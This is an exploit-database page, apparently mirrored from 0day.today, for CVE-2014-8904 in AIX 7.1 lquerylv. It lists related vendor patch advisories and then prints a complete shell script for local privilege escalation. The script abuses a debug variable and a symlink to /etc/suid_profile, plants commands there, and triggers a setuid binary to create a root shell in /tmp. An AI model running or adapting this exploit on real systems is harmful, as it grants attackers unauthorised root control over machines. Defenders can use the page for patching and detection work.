AIX 7.1 - lquerylv Local Privilege Escalation Vulnerability

🗓️ 30 Oct 2015 00:00:00Reported by S2 CrewType

zdt🔗 0day.today👁 62 Views

AIX 7.1 lquerylv Local Privilege Escalation Vulnerability exploi

Reporter	Title	Published	Views	Family All 19
Tenable Nessus	AIX 6.1 TL 9 : lvm (IV67907)	2 Feb 201500:00	–	nessus
Tenable Nessus	AIX 7.1 TL 3 : lvm (IV67908)	14 Jan 201500:00	–	nessus
Tenable Nessus	AIX 5.3 TL 12 : lvm (IV68070)	14 Jan 201500:00	–	nessus
Tenable Nessus	AIX 6.1 TL 8 : lvm (IV68082)	14 Jan 201500:00	–	nessus
Tenable Nessus	AIX 6.1 TL 9 : lvm (IV68099) (deprecated)	14 Jan 201500:00	–	nessus
Tenable Nessus	AIX 7.1 TL 2 : lvm (IV68478)	14 Jan 201500:00	–	nessus
Tenable Nessus	AIX 7.1 TL 3 : bos.rte.lvm (U865854)	29 May 201500:00	–	nessus
Tenable Nessus	AIX 6.1 TL 9 : bos.rte.lvm (U865862)	29 May 201500:00	–	nessus
Tenable Nessus	AIX 7.1 TL 2 : bos.rte.lvm (U867549)	30 Sep 201500:00	–	nessus
Tenable Nessus	AIX 6.1 TL 8 : bos.rte.lvm (U868378)	25 Sep 201500:00	–	nessus

#!/bin/sh
#
# Exploit Title: AIX 7.1 lquerylv privilege escalation
# Date: 2015.10.30
# Exploit Author: S2 Crew [Hungary]
# Vendor Homepage: www.ibm.com
# Software Link: -
# Version: - 
# Tested on: AIX 7.1 (7100-02-03-1334)
# CVE : CVE-2014-8904
#
# From file writing to command execution ;) 
#
export _DBGCMD_LQUERYLV=1
umask 0
ln -s /etc/suid_profile /tmp/DEBUGCMD
/usr/sbin/lquerylv
 
cat << EOF >/etc/suid_profile
cp /bin/ksh /tmp/r00tshell
/usr/bin/syscall setreuid 0 0
chown root:system /tmp/r00tshell
chmod 6755 /tmp/r00tshell
EOF
 
/opt/IBMinvscout/bin/invscoutClient_VPD_Survey # suid_profile because uid!=euid
/tmp/r00tshell

#  0day.today [2018-03-01]  #

30 Oct 2015 00:00Current

0.6Low risk

Vulners AI Score0.6

EPSS0.0056